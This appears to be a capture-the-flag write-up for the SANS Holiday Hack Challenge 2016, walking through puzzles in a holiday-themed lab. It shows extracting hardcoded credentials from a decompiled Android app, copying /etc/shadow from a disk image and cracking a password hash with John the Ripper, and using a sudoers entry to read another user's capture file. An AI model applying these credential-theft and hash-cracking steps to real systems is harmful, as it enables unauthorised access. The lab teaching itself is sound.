NORTHPOLEJOYHOHOHOF.............."????????????????4PEACEONEARTHQQWHOHOHOELF
HOHOHOELFSANTAELFQf...............................]SANTAQWJOYWNORTHPOLEELFQ
HOHOHOPEACEONEARTHf...............................]PEACEONEARTHPEACEONEARTH
JOYPEACEONEARTHELFf...............................]HOHOHOSANTASANTASANTAELF
GOODWILLTOWARDSMENf...............................]PEACEONEARTHNORTHPOLEJOY
NORTHPOLEHOHOHOELFf...............................]HOHOHOCHRISTMASWSANTAELF
ELFSANTACHRISTMASQf...............................]SANTAJOYJOYQWSANTAJOYWQQ
HOHOHONORTHPOLEJOYf...............................]PEACEONEARTHSANTAHOHOHOQ
GOODWILLTOWARDSMENf...............................]CHRISTMASCHRISTMASSANTAQ
PEACEONEARTHELFJOYf...............................]PEACEONEARTHJOYELFQQWJOY
JOYSANTAPEACEONEARTHSANTAWQQWQQWGOODWILLTOWARDSMENCHRISTMASJOYSANTASANTAJOY
ELFNORTHPOLESANTAELFHOHOHOJOYGOODWILLTOWARDSMENNORTHPOLECHRISTMASQWJOYWELFQ
HOHOHOCHRISTMASSANTAJOYCHRISTMASHOHOHOSANTAELFQQWJOYHOHOHOJOYJOYELFJOYELFQQ
CHRISTMASJOYJOYHOHOHOHOHOHOJOYPEACEONEARTHSANTAELFGOODWILLTOWARDSMENELFELFQ
HOHOHOELFHOHOHOJOYNORTHPOLEHOHOHOCHRISTMASQ???????4GOODWILLTOWARDSMENELFELF
NORTHPOLECHRISTMASQQWELFWELFWPEACEONEARTHQQ.......]HOHOHOCHRISTMASQWELFELFQ
JOYJOYGOODWILLTOWARDSMENSANTAELFQWNORTHPOLE.......]PEACEONEARTHCHRISTMASJOY
JOYELFCHRISTMASELFHOHOHOPEACEONEARTHJOYJOYQ.......]GOODWILLTOWARDSMENHOHOHO
NORTHPOLESANTAELFQQWGOODWILLTOWARDSMENELFQQ.......]CHRISTMASCHRISTMASJOYQWQ
HOHOHOSANTAELFNORTHPOLEPEACEONEARTHELFQWELF.......]SANTAHOHOHOELFSANTAELFQQ
HOHOHOSANTAPEACEONEARTHELFWJOYWSANTAQWELFQQ.......]NORTHPOLENORTHPOLEWELFQQ
SANTAHOHOHOELFELFNORTHPOLENORTHPOLEWELFJOYQ.......]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENHOHOHOWGOODWILLTOWARDSMEN.......]SANTASANTAHOHOHOQWHOHOHO
SANTANORTHPOLESANTAWGOODWILLTOWARDSMENELFQQ.......]CHRISTMASPEACEONEARTHJOY
ELFHOHOHONORTHPOLEP????????????????????????.......]CHRISTMASSANTAQQWJOYELFQ
PEACEONEARTHSANTAQf...............................]ELFHOHOHOSANTAELFJOYELFQ
ELFCHRISTMASELFELFf...............................]GOODWILLTOWARDSMENSANTAQ
PEACEONEARTHHOHOHOf...............................]GOODWILLTOWARDSMENJOYJOY
CHRISTMASNORTHPOLEf...............................]HOHOHONORTHPOLEQWJOYELFQ
ELFPEACEONEARTHELFf...............................]GOODWILLTOWARDSMENSANTAQ
JOYJOYELFSANTAELFQf...............................]SANTANORTHPOLEELFSANTAWQ
JOYHOHOHOSANTAJOYQf...............................]PEACEONEARTHNORTHPOLEELF
SANTAELFELFHOHOHOQf...............................]CHRISTMASPEACEONEARTHELF
HOHOHONORTHPOLEELFf...............................]NORTHPOLEHOHOHOJOYWSANTA
PEACEONEARTHELFJOY6aaaaaaaaaaaaaaaaaaaaaaaa.......]PEACEONEARTHHOHOHOSANTAQ
CHRISTMASELFELFJOYQQWWWWWWWWWWWWWWWWWWWWWQQ.......]NORTHPOLENORTHPOLESANTAQ
NORTHPOLECHRISTMASHOHOHONORTHPOLEHOHOHOJOYQ.......]PEACEONEARTHELFQQWHOHOHO
JOYPEACEONEARTHJOYCHRISTMASPEACEONEARTHELFQ.......]NORTHPOLEJOYPEACEONEARTH
NORTHPOLECHRISTMASPEACEONEARTHHOHOHOSANTAQQ.......]PEACEONEARTHCHRISTMASELF
HOHOHOHOHOHONORTHPOLEELFCHRISTMASHOHOHOELFQ.......]HOHOHONORTHPOLEELFSANTAQ
NORTHPOLEJOYHOHOHOQQWPEACEONEARTHCHRISTMASQ.......]ELFHOHOHOELFSANTAJOYQQWQ
ELFJOYJOYJOYNORTHPOLEJOYPEACEONEARTHSANTAQQ.......]CHRISTMASELFELFQQWHOHOHO
SANTASANTACHRISTMASNORTHPOLENORTHPOLEELFJOY.......]PEACEONEARTHPEACEONEARTH
ELFPEACEONEARTHJOYQWJOYJOYSANTAHOHOHOJOYELF.......]GOODWILLTOWARDSMENJOYQWQ
JOYCHRISTMASJOYCHRISTMASJOYWNORTHPOLEJOYJOYaaaaaaajCHRISTMASPEACEONEARTHJOY
PEACEONEARTHCHRISTMASPEACEONEARTHWELFWSANTAWWWWWWCHRISTMASJOYNORTHPOLEJOYQQ
SANTACHRISTMASSANTAELFJOYQWNORTHPOLEELFSANTAELFQQP]NORTHPOLESANTAJOYWJOYWQQ
ELFJOYCHRISTMASNORTHPOLEWPEACEONEARTHNORTHPOLEQ@^.]HOHOHOHOHOHOELFCHRISTMAS
HOHOHOELFSANTASANTAWNORTHPOLENORTHPOLEJOYQWELFP`..]CHRISTMASPEACEONEARTHJOY
CHRISTMASJOYPEACEONEARTHJOYSANTAQWCHRISTMASQ@"....]JOYGOODWILLTOWARDSMENJOY
GOODWILLTOWARDSMENJOYJOYWHOHOHOHOHOHOQQWELFP`.....]GOODWILLTOWARDSMENELFELF
ELFSANTAHOHOHOGOODWILLTOWARDSMENCHRISTMASW".......]PEACEONEARTHELFQQWELFWQQ
GOODWILLTOWARDSMENNORTHPOLEPEACEONEARTHQP`........]GOODWILLTOWARDSMENSANTAQ
CHRISTMASHOHOHOELFQWJOYWSANTAJOYWELFQQW"..........]GOODWILLTOWARDSMENELFELF
JOYHOHOHOGOODWILLTOWARDSMENHOHOHOELFQP`...........]NORTHPOLENORTHPOLEHOHOHO
PEACEONEARTHGOODWILLTOWARDSMENWJOYQW".............]HOHOHOHOHOHONORTHPOLEJOY
ELFPEACEONEARTHJOYCHRISTMASHOHOHOQP`..............]PEACEONEARTHSANTAWELFWQQ
NORTHPOLEHOHOHOJOYELFSANTAQQWJOYW!................yPEACEONEARTHCHRISTMASELF
CHRISTMASELFELFJOYP?????????????`...............sPEACEONEARTHJOYJOYSANTAELF
JOYHOHOHOELFHOHOHOf..........................._mWQWNORTHPOLECHRISTMASHOHOHO
GOODWILLTOWARDSMENf..........................jCHRISTMASNORTHPOLESANTAJOYJOY
NORTHPOLEHOHOHOELFf........................_JOYPEACEONEARTHELFJOYJOYWJOYWQQ
GOODWILLTOWARDSMENf......................_yGOODWILLTOWARDSMENCHRISTMASELFQQ
NORTHPOLENORTHPOLEf.....................:GOODWILLTOWARDSMENSANTASANTAELFJOY
ELFNORTHPOLEJOYJOYf......................-9NORTHPOLEPEACEONEARTHCHRISTMASQQ
NORTHPOLEELFSANTAQf........................?WGOODWILLTOWARDSMENHOHOHOSANTAQ
GOODWILLTOWARDSMENf..........................4WJOYPEACEONEARTHHOHOHOWELFWQQ
PEACEONEARTHSANTAQf...........................-$SANTACHRISTMASHOHOHOELFJOYQ
HOHOHOELFJOYJOYJOY6aaaaaaaaaaaaa,...............?WWPEACEONEARTHPEACEONEARTH
JOYELFHOHOHOJOYSANTAWWWWWWWWWWWQQc...............-4NORTHPOLEHOHOHOQWJOYELFQ
NORTHPOLEGOODWILLTOWARDSMENSANTAWWg,..............]GOODWILLTOWARDSMENSANTAQ
NORTHPOLEHOHOHOELFHOHOHOCHRISTMASELFc.............]HOHOHOELFSANTAWCHRISTMAS
PEACEONEARTHJOYJOYNORTHPOLESANTAJOYWWg,...........]GOODWILLTOWARDSMENJOYQWQ
ELFHOHOHOELFHOHOHOCHRISTMASCHRISTMASJOYc..........]HOHOHOJOYELFQWCHRISTMASQ
PEACEONEARTHSANTAJOYWCHRISTMASJOYSANTAWWw,........]PEACEONEARTHHOHOHOELFELF
CHRISTMASJOYPEACEONEARTHSANTAPEACEONEARTHQc.......]PEACEONEARTHSANTAELFQWQQ
NORTHPOLEPEACEONEARTHJOYNORTHPOLEJOYELFQQWWw......]PEACEONEARTHWHOHOHOJOYQQ
GOODWILLTOWARDSMENQWHOHOHOQWNORTHPOLEELFELFQQ/....]PEACEONEARTHNORTHPOLEJOY
ELFGOODWILLTOWARDSMENCHRISTMASJOYWJOYWSANTAJOYg...]SANTASANTAHOHOHOJOYQWJOY
NORTHPOLEPEACEONEARTHGOODWILLTOWARDSMENELFELFQWQ,.]PEACEONEARTHNORTHPOLEJOY
CHRISTMASCHRISTMASJOYSANTAWGOODWILLTOWARDSMENQQWQwjPEACEONEARTHSANTAQWJOYQQ
ELFPEACEONEARTHJOYJOYJOYWSANTAQQWPEACEONEARTHCHRISTMASGOODWILLTOWARDSMENJOY
CHRISTMASJOYJOYJOYQWGOODWILLTOWARDSMENSANTAQQWGOODWILLTOWARDSMENJOYWHOHOHOQ
PEACEONEARTHSANTACHRISTMASSANTAELFELFQQWJOYWGOODWILLTOWARDSMENHOHOHOHOHOHOQ
PEACEONEARTHELFELFSANTAQWJOYNORTHPOLEPEACEONEARTHELFSANTAHOHOHOPEACEONEARTH
NORTHPOLECHRISTMASELFNORTHPOLEELFJOYQWCHRISTMASGOODWILLTOWARDSMENNORTHPOLEQ
JOYJOYSANTAJOYSANTACHRISTMASJOYQWPEACEONEARTHNORTHPOLECHRISTMASJOYHOHOHOELF
JOYPEACEONEARTHELFQWELFWCHRISTMASSANTASANTANORTHPOLEQWPEACEONEARTHJOYWJOYWQ
JOYPEACEONEARTHELFQWELFWCHRISTMASSANTASANTANORTHPOLEQWPEACEONEARTHJOYWJOYWQ
JOYPEACEONEARTHELFQWELFWCHRISTMASSANTASANTANORTHPOLEQWPEACEONEARTHJOYWJOYWQ
JOYPEACEONEARTHELFQWELFWCHRISTMASSANTASANTANORTHPOLEQWPEACEONEARTHJOYWJOYWQ

Answer: BUGBOUNTY

For this we look at the instagram account. We spot a picture of a very untidy desk. Looking a little closer there are a few things of interest that can help us identify the zip file.


A zip name and a domain name. – http://northpolewonderland.com/SantaGram_v4.2.zip We can use the password bugbounty we got from the previous question to unlock the zip and we get:

  • APK file.

For this we need to decompile the APK back in to something resembling source code so we can look through the code.

The clues walking around the North Pole suggested apktool, sounds like a good idea to me. Follow the install guide at https://ibotpeaches.github.io/Apktool/install/

[email protected]:~/SANS$ apktool d SantaGram_4.2.apk
I: Using Apktool 2.2.1 on SantaGram_4.2.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/thehermit/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
[email protected]:~/SANS$

i now have a folder with all the decompiled source code, and there’s a lot of it. Grep is going to be my friend here. Im looking for usernames and passwords to lets start there.

egrep -r -A2 'username|password' SantaGram_4.2

This command tells grep to use regualr expresssions search for ‘username’ OR ‘password’ and to read all files recursively in the SantaGram_4.2 folder which is where all our source is now stored. the -A2 tells grep to also display 2 lines after the match. This is because in smali the variable name is set on one line then the value stored on the line after.

. . . 

SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali:    const-string v1, "username"
SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali-
SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali-    const-string v2, "guest"
--
SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali:    const-string v1, "password"
SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali-
SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali-    const-string v2, "busyreindeer78"

. . .

That looks like our answer

  • Username = guest
  • password = busyreindeer78

We are looking for an audio file so lets search for MP3’s

[email protected]:~/SANS$ find SantaGram_4.2/ -type f -name *.mp3
SantaGram_4.2/res/raw/discombobulatedaudio1.mp3

This command tells find to look recursivly through the SantaGram_4.2 directory and list all items that are files and match the filename *.mp3

If the file wasn’t named as an mp3 or was some other format we could use the file command on all files and see which are detected as audio.

[email protected]:~/SANS$ find SantaGram_4.2 -type f -exec file {} + | grep audio
SantaGram_4.2/res/raw/discombobulatedaudio1.mp3:                                            Audio file with ID3 version 2.3.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, JntStereo

One of the useful elements of find is that when it finds an item that matches you can run other commands on these files. In this case for every item that is a file it will run the unix file command. with the -exec option. From here we just pipe the output in to grep to filter for audio files.

Whichever way you try the answer is discombobulatedaudio1.mp3

Before you can answer this question you need to complete the Cranberry Pi Quests and assembled your Pi, See the Quests for more information. Once the Pi is assembled by Holly Evergreen you will be given a Cranbian Image to download https://www.northpolewonderland.com/cranbian.img.zip

Once unzipped file tells us its: x86 boot sector. So as expected this is an image file. The easiest way to get the current password is to grab a copy of the /etc/shadow file and crack the hashes.

First lets mount the image so we can grab the file we need. To mount the os partition we first need to calculate the starting offset of the partition and then use the mount command.

[email protected]:~/SANS$ fdisk -l cranbian-jessie.img

Disk cranbian-jessie.img: 1389 MB, 1389363200 bytes
255 heads, 63 sectors/track, 168 cylinders, total 2713600 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x5a7089a1

              Device Boot      Start         End      Blocks   Id  System
cranbian-jessie.img1            8192      137215       64512    c  W95 FAT32 (LBA)
cranbian-jessie.img2          137216     2713599     1288192   83  Linux
[email protected]:~/SANS$

fdisk tells us there are two partitions on this image. The first is typically the boot partition and the second is the OS partition. In this instance the Linux partition starts at 137216 and the sector size is 512 bytes. If we multiply these together we can get the physical offset in the file of our OS File System. 70254592.

Then its just a matter of mounting it and copying out the /etc/passwd and /etc/shadow files.

[email protected]:~# mkdir cranbian_mount
[email protected]:~# mount -o loop,offset=70254592 cranbian-jessie.img cranbian_mount/
[email protected]:~# cp cranbian_mount/etc/passwd .
[email protected]:~# cp cranbian_mount/etc/sh
shadow   shadow-  shells   
[email protected]:~# cp cranbian_mount/etc/sh
shadow   shadow-  shells   
[email protected]:~# cp cranbian_mount/etc/shadow .

we have the hash for the cranpi account

root:*:17067:0:99999:7:::
daemon:*:17067:0:99999:7:::
bin:*:17067:0:99999:7:::
sys:*:17067:0:99999:7:::
sync:*:17067:0:99999:7:::
games:*:17067:0:99999:7:::
man:*:17067:0:99999:7:::
lp:*:17067:0:99999:7:::
mail:*:17067:0:99999:7:::
news:*:17067:0:99999:7:::
uucp:*:17067:0:99999:7:::
proxy:*:17067:0:99999:7:::
www-data:*:17067:0:99999:7:::
backup:*:17067:0:99999:7:::
list:*:17067:0:99999:7:::
irc:*:17067:0:99999:7:::
gnats:*:17067:0:99999:7:::
nobody:*:17067:0:99999:7:::
systemd-timesync:*:17067:0:99999:7:::
systemd-network:*:17067:0:99999:7:::
systemd-resolve:*:17067:0:99999:7:::
systemd-bus-proxy:*:17067:0:99999:7:::
messagebus:*:17067:0:99999:7:::
avahi:*:17067:0:99999:7:::
ntp:*:17067:0:99999:7:::
sshd:*:17067:0:99999:7:::
statd:*:17067:0:99999:7:::
cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:17140:0:99999:7:::

Now time to get cracking, Another elf in the North Pole suggested the rockyou word list, which is included in kali, would be a good choice.

[email protected]:~# john --wordlist=/usr/share/wordlists/rockyou.txt --fork=4 combined.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status

It doesn’t take long before our password is cracked.

[email protected]:~# john combined.txt --show
cranpi:yummycookies:1000:1000:,,,:/home/cranpi:/bin/bash

1 password hash cracked, 0 left
[email protected]:~# 

Answer: yummycookies

Now we have completed the Cranberry Pi Achievements we can access the terminals in the north pole. There are 5 terminals and you can use the Maps at the end of this post to figure out where each one is located.

When you first load the terminal you are presented with the following.

Seems simple enough lets tcpdump /out.pcap and see what we have

[email protected]:/$ tcpdump -r out.pcap
tcpdump: out.pcap: Permission denied
[email protected]:/$

Ok not that simple then. Lets have a look at the permissions on the pcap file.

[email protected]:/$ ls -ahtl /out.pcap
-r-------- 1 itchy itchy 1.1M Dec  2 15:05 /out.pcap

Seems itchy is the only person who can read the file. We need to be itchy. Lets try a few ways to run tcpdump as itchy

[email protected]:/$ su - itchy -c tcpdump /out.pcap 
Password:

That’s not going to work

[email protected]:/$ sudo -u itchy tcpdump -r /out.pcap 
sudo: unable to resolve host f104dddd0fc6
reading from file out.pcap, link-type EN10MB (Ethernet)
11:28:00.520764 IP 192.168.188.1.52102 > 192.168.188.130.http: Flags [S], seq 2857348850, win 
65535, options [mss 1460,nop,wscale 5,nop,nop,TS val 2773686863 ecr 0,sackOK,eol], length 0
11:28:00.520829 IP 192.168.188.130.http > 192.168.188.1.52102: Flags [S.], seq 2484589859, ack
 2857348851, win 28960, options [mss 1460,sackOK,TS val 638274 ecr 2773686863,nop,wscale 7], l
ength 0
11:28:00.520967 IP 192.168.188.1.52102 > 192.168.188.130.http: Flags [.], ack 1, win 4117, opt
ions [nop,nop,TS val 2773686863 ecr 638274], length 0
11:28:00.521004 IP 192.168.188.1.52102 > 192.168.188.130.http: Flags [P.], seq 1:160, ack 1, w
in 4117, options [nop,nop,TS val 2773686863 ecr 638274], length 159
11:28:00.521010 IP 192.168.188.130.http > 192.168.188.1.52102: Flags [.], ack 160, win 235, op
tions [nop,nop,TS val 638274 ecr 2773686863], length 0

Excellent looks like there is an entry in the /etc/sudoers file that will let us access this file.

now lets see about that password. tcpdump gave us a lot of output, I’m probably looking for clear text password to lets just try strings

[email protected]:/$ sudo -u itchy strings out.pcap 
sudo: unable to resolve host f104dddd0fc6
ZAX<
ZAX}
ZAX,
BGET /firsthalf.html HTTP/1.1
User-Agent: Wget/1.17.1 (darwin15.2.0)
Accept: */*
Accept-Encoding: identity
Host: 192.168.188.130
Connection: Keep-Alive
ZAX2
4hf@
Ehg@
OHTTP/1.0 200 OK
ZAX
ZAX#
[hh@
OServer: SimpleHTTP/0.6 Python/2.7.12+
ZAXr
rhi@
ODate: Fri, 02 Dec 2016 11:28:00 GMT
Content-type: text/html
Ihj@
PContent-Length: 113
ZAX 
ZAX2
ZAXI
dhk@
PLast-Modified: Fri, 02 Dec 2016 11:25:35 GMT
P<html>
<head></head>
<body>
<form>
<input type="hidden" name="part1" value="santasli" />
</form>
</body>
</html>
4hm@
ZAXW
@2/@
DGET /secondhalf.bin HTTP/1.1
User-Agent: Wget/1.17.1 (darwin15.2.0)
Accept: */*
Accept-Encoding: identity
Host: 192.168.188.130
Connection: Keep-Alive
ZAX 
THTTP/1.0 200 OK
TServer: SimpleHTTP/0.6 Python/2.7.12+
ZAX"
,#"=X
TDate: Fri, 02 Dec 2016 11:28:00 GMT
Content-type: application/octet-stream
ZAXr
,#o=X
UContent-Length: 1048097
Last-Modified: Fri, 02 Dec 2016 11:26:12 GMT
4-1@

This gives us part one “santasli” and as any good Simpsons fan will tell you. The full password is going to be santaslittlehelper. But how can we read that bin file that contains the secondhalf?

Lets try strings again and change the encoding to read unicode strings.

[email protected]:/$ sudo -u itchy strings -e l out.pcap 
sudo: unable to resolve host f104dddd0fc6
part2:ttlehelper

That confirms it. The password to the door is santaslittlehelper

When you first open the terminal you are presented with the following.

Find the passphrase deep in the directories. Ok recursive ls seems like a good shout here.

[email protected]:~$ ls -ahtlR
.:
total 32K
drwxr-xr-x 20 elf  elf  4.0K Dec  6 19:40 .
drwxr-xr-x 22 root root 4.0K Dec  6 19:40 ..
-rw-r--r--  1 elf  elf  3.9K Dec  6 19:40 .bashrc
drwxr-xr-x 18 root root 4.0K Dec  6 19:40 .doormat
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 var
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 temp
-rw-r--r--  1 elf  elf   220 Nov 12  2014 .bash_logout
-rw-r--r--  1 elf  elf   675 Nov 12  2014 .profile
./.doormat:
total 20K
drwxr-xr-x 20 elf  elf  4.0K Dec  6 19:40 ..
drwxr-xr-x 18 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 16 root root 4.0K Dec  6 19:40 . 
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 share
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 temp
./.doormat/. :
total 20K
drwxr-xr-x 14 root root 4.0K Dec  6 19:40  
drwxr-xr-x 16 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 18 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 bin
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 not_here

./.doormat/. / :
total 20K
drwxr-xr-x 14 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 16 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x 12 root root 4.0K Dec  6 19:40 \
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 opt
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 var

./.doormat/. / /\:
total 20K
drwxr-xr-x 12 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 14 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x 10 root root 4.0K Dec  6 19:40 \\
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 santa
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 ls

./.doormat/. / /\/\\:
total 20K
drwxr-xr-x 10 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 12 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  8 root root 4.0K Dec  6 19:40 Don't Look Here!
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 holiday
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 temp

./.doormat/. / /\/\\/Don't Look Here!:
total 20K
drwxr-xr-x  8 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 10 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  6 root root 4.0K Dec  6 19:40 You are persistent, aren't you?
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 secret
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 files

./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?:
total 20K
drwxr-xr-x 2 root root 4.0K Dec  6 19:40 '
drwxr-xr-x 6 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 8 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x 2 root root 4.0K Dec  6 19:40 cookbook
drwxr-xr-x 2 root root 4.0K Dec  6 19:40 temp

./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/':
total 12K
drwxr-xr-x 2 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 6 root root 4.0K Dec  6 19:40 ..
-rw-r--r-- 1 root root   17 Dec  6 19:39 key_for_the_door.txt

./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/cookbook:
total 8.0K
drwxr-xr-x 6 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x 2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/temp:
total 8.0K
drwxr-xr-x 6 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x 2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/\\/Don't Look Here!/secret:
total 8.0K
drwxr-xr-x 8 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x 2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/\\/Don't Look Here!/files:
total 8.0K
drwxr-xr-x 8 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x 2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/\\/holiday:
total 8.0K
drwxr-xr-x 10 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/\\/temp:
total 8.0K
drwxr-xr-x 10 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/santa:
total 8.0K
drwxr-xr-x 12 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/ls:
total 8.0K
drwxr-xr-x 12 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /opt:
total 8.0K
drwxr-xr-x 14 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /var:
total 8.0K
drwxr-xr-x 14 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .

./.doormat/. /bin:
total 8.0K
drwxr-xr-x 16 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .

./.doormat/. /not_here:
total 8.0K
drwxr-xr-x 16 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .

./.doormat/share:
total 8.0K
drwxr-xr-x 18 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .

./.doormat/temp:
total 8.0K
drwxr-xr-x 18 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .

./var:
total 8.0K
drwxr-xr-x 20 elf  elf  4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .

./temp:
total 8.0K
drwxr-xr-x 20 elf  elf  4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .
[email protected]:~$

key_for_the_door.txt looks like a winner. But how to read it. I don’t really feel like trying to escape all those directory names. Fortunately i don’t need to. As we saw earlier find has a nice exec feature and will let me target only a single file by name.

[email protected]:~$ find -name key_for_the_door.txt -exec cat {} +
key: open_sesame

This command is as simple as it looks. FInd a file named key_for_the_door.txt and then run cat against the file. Which then outputs the contents of the file.

Password for the door is open_sesame

When you first open the terminal you are presented with the following.

Fans of the film WarGames should immediately recognise this and it doesn’t take long to realise we are playing the role of David. To complete this challenge just play out the scene making sure you get all the case and punctuation correct.

GREETINGS PROFESSOR FALKEN.

Hello.


HOW ARE YOU FEELING TODAY?

I'm fine. How are you?


EXCELLENT, IT'S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6/23/73?


People sometimes make mistakes.


YES THEY DO. SHALL WE PLAY A GAME?

Love to. How about Global Thermonuclear War?

WOULDN'T YOU PREFER A GOOD GAME OF CHESS?

Later. Let's play Global Thermonuclear War.

FINE



,------~~v,_         _                     _--^\
 |'          \   ,__/ ||                 _/    /,_ _
/             \,/     /         ,,  _,,/^         v v-___
|                    /          |'~^                     \
\                   |         _/                     _ _/^
 \                 /         /                   ,~~^/ | 
  ^~~_       _ _   /          |          __,, _v__\   \/
      '~~,  , ~ \ \           ^~       /    ~   //
          \/     \/             \~,  ,/          
                                   ~~
   UNITED STATES                   SOVIET UNION
WHICH SIDE DO YOU WANT?
     1.    UNITED STATES
     2.    SOVIET UNION
PLEASE CHOOSE ONE: 

2

AWAITING FIRST STRIKE COMMAND
-----------------------------
PLEASE LIST PRIMARY TARGETS BY
CITY AND/OR COUNTRY NAME: 
Las Vegas
LAUNCH INITIATED, HERE'S THE KEY FOR YOUR TROUBLE: 
LOOK AT THE PRETTY LIGHTS
Press Enter To Continue

Password to the secret bookcase: LOOK AT THE PRETTY LIGHTS

When you first open the terminal you are presented with the following

a quick ls show us an executable file named wumpus and opening this drops us in to an old school mud.

[email protected]:~$ ./wumpus
Instructions? (y-n) y
Sorry, but the instruction file seems to have disappeared in a
puff of greasy black smoke! (poof)
You're in a cave with 20 rooms and 3 tunnels leading from each room.
There are 3 bats and 3 pits scattered throughout the cave, and your
quiver holds 5 custom super anti-evil Wumpus arrows.  Good luck.
You are in room 16 of the cave, and have 5 arrows left.
*sniff* (I can smell the evil Wumpus nearby!)
There are tunnels to rooms 13, 15, and 19.
Move or shoot? (m-s)

No instructions sad times. what about checking for command line help

[email protected]:~$ ./wumpus --help
./wumpus: invalid option -- '-'
usage: wump [parameters]
[email protected]:~$

OK. No help but looks like it accepts command line parameters. Lets have a play.

[email protected]:~$ ./wumpus -a    
./wumpus: option requires an argument -- 'a'
usage: wump [parameters]
[email protected]:~$ ./wumpus -a a
Instructions? (y-n) n
You're in a cave with 20 rooms and 3 tunnels leading from each room.
There are 3 bats and 3 pits scattered throughout the cave, and your
quiver holds 0 custom super anti-evil Wumpus arrows.  Good luck.
You are in room 3 of the cave, and have 0 arrows left.
*rustle* *rustle* (must be bats nearby)
There are tunnels to rooms 6, 15, and 20.
Move or shoot? (m-s)

OK so running with -a a seems to open the game and now i have 0 arrows. I had 5 before.

[email protected]:~$ ./wumpus -a 100000
Instructions? (y-n) n
You're in a cave with 20 rooms and 3 tunnels leading from each room.
There are 3 bats and 3 pits scattered throughout the cave, and your
quiver holds 100000 custom super anti-evil Wumpus arrows.  Good luck.
You are in room 8 of the cave, and have 100000 arrows left.
*rustle* *rustle* (must be bats nearby)
*whoosh* (I feel a draft from some pits).
There are tunnels to rooms 12, 17, and 19.
Move or shoot? (m-s)

Excellent 100,000 custom super anti-evil Wumpus arrows, lets see what else we can set.

  • -a i = number of arrows
  • -b i = Number of Bats
